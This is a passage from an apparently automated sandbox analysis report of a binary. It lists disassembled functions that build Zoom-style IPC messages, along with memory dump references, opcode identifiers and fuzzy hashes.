                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Result$com.zoom.app.assistant.audio.configure.response
                • API String ID: 4281283084-3713804244
                • Opcode ID: 80058abca5fbcf9c1e5776115cf271fcfd96b6b2bdb1a378e04763ca33f6246c
                • Instruction ID: 8b0c0ef08330d46db4e96b9cbfdffdc42e7a77a724bd012edad91b3f7281259c
                • Opcode Fuzzy Hash: 80058abca5fbcf9c1e5776115cf271fcfd96b6b2bdb1a378e04763ca33f6246c
                • Instruction Fuzzy Hash: 1DE0D8B0A403C467D710BB158C46B2F76E8A780B19F88446DB2445B382CBF44800EB74
                Function 00C74BB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74BB7
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cdnUpdateSuperNodeMaxLoad,0000279D,max_load,00000004), ref: 00C74BD2
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.cdnUpdateSuperNodeMaxLoad$max_load
                • API String ID: 4281283084-4287560878
                • Opcode ID: 33b08d71b4d36d961550ae37ec05fbb2b4a82364c15ed1d8c5d98f4f230a3cb1
                • Instruction ID: 038f05f81261a3b21003122dd6d1ea9675dd537e8f26b0f20332f2f135a888da
                • Opcode Fuzzy Hash: 33b08d71b4d36d961550ae37ec05fbb2b4a82364c15ed1d8c5d98f4f230a3cb1
                • Instruction Fuzzy Hash: F1E0D8B0A04740A7D7307B145C49B5E26A4AB5071AF904D28B2065E3D2CBF44D85EB74
                Function 00C74B50 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74B57
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cdnInfo,0000279B,ecdn_info,00000004), ref: 00C74B72
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.cdnInfo$ecdn_info
                • API String ID: 3166440930-524624299
                • Opcode ID: b32e9e0b504e1444a747325c8294bce37141c926a8c60e8c9103504d358f5913
                • Instruction ID: 49d69350cc44d31dd869e8e0708f129f6d8399afca4f627886868bb3ef37f928
                • Opcode Fuzzy Hash: b32e9e0b504e1444a747325c8294bce37141c926a8c60e8c9103504d358f5913
                • Instruction Fuzzy Hash: 80E0D8B4A04780A7CB20BB155C55B1E66B4E75071BF404928B5055F392CBF44884D774
                Function 00C6AB60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6AB67
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.notifyOpenUrlWithAuth,00002761,Url,00000004), ref: 00C6AB82
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Url$com.Zoom.app.conf.notifyOpenUrlWithAuth
                • API String ID: 3166440930-1448513644
                • Opcode ID: d3befc5d19eaeae6d444c84dc0750d731272f666023eda966c1a0da64b02879a
                • Instruction ID: 959f13455d60f4665e1c85ce8343b3bc526d76f4cf68250ab9f0b6726e8526b3
                • Opcode Fuzzy Hash: d3befc5d19eaeae6d444c84dc0750d731272f666023eda966c1a0da64b02879a
                • Instruction Fuzzy Hash: 96E0D8B5A003C097D7206B149C8DB1E62B4DB5071AF500428B6059F3D1CBF44944D7B6
                Function 00C6AB00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6AB07
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.notifyUpgradeAccount,00002733,Parameter,00000004), ref: 00C6AB22
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Parameter$com.Zoom.app.conf.notifyUpgradeAccount
                • API String ID: 3166440930-431621009
                • Opcode ID: ee27831abb30f1012715d5b78dbd2373859a30f642fca6abe3178f46e900653d
                • Instruction ID: 7a37fd1c050e560241b513beb627a41b67b2a699e43e65ae9ebc6a03db7b8d3a
                • Opcode Fuzzy Hash: ee27831abb30f1012715d5b78dbd2373859a30f642fca6abe3178f46e900653d
                • Instruction Fuzzy Hash: 4FE020B090039097C730AB20AC49B1E63B4EF50B1BF44092CB2015F3D1CBF44984D7B9
                Function 00C72B10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72B17
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.onlivetranscriptstatus.notify,00009E93,nStatus,00000004), ref: 00C72B32
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.cci.ccivideo.onlivetranscriptstatus.notify$nStatus
                • API String ID: 4281283084-2687401744
                • Opcode ID: c636b564003c8e58c765b0440d2a924ea722f630ad41658feed7051d92ea8079
                • Instruction ID: e30fe1bc5e220e8ba406d5a58cbe305c77ad5c8625a67a9499a9e85de5777618
                • Opcode Fuzzy Hash: c636b564003c8e58c765b0440d2a924ea722f630ad41658feed7051d92ea8079
                • Instruction Fuzzy Hash: FCE0D870A00380A7DB20FF11DC4576E62B4AB40719F844479B2045F382CBF44901DB74
                Function 00C74CD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74CD7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.vdi.plugin.public.ip,000027BB,public_ip,00000004), ref: 00C74CF2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.vdi.plugin.public.ip$public_ip
                • API String ID: 3166440930-2705417876
                • Opcode ID: c9a3e507c758eda717e15d2be0c32edccb69c0d2bed911663d25476a796650a0
                • Instruction ID: ac3993e6ebee9bc04a28c4c543f4d6e52d49dd60b80cfd0f93aab11f6a1a5f7a
                • Opcode Fuzzy Hash: c9a3e507c758eda717e15d2be0c32edccb69c0d2bed911663d25476a796650a0
                • Instruction Fuzzy Hash: 49E0D8B0A0079097D7206B158C49F1E66B49754B1AF444469BA155B3D1CBF44844DF79
                Function 00C6ACF0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6ACF7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C6AD12
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
